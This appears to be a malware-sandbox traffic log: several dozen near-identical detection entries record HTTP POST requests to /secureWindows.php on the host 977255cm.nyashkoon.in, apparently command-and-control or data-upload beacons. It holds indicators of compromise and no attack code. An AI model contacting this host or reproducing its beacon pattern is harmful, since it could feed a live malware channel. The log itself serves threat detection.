Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 977255cm.nyashkoon.in
Content-Length: 1340
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 977255cm.nyashkoon.in
Content-Length: 1072
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 977255cm.nyashkoon.in
Content-Length: 1312
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 977255cm.nyashkoon.in
Content-Length: 1072
Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
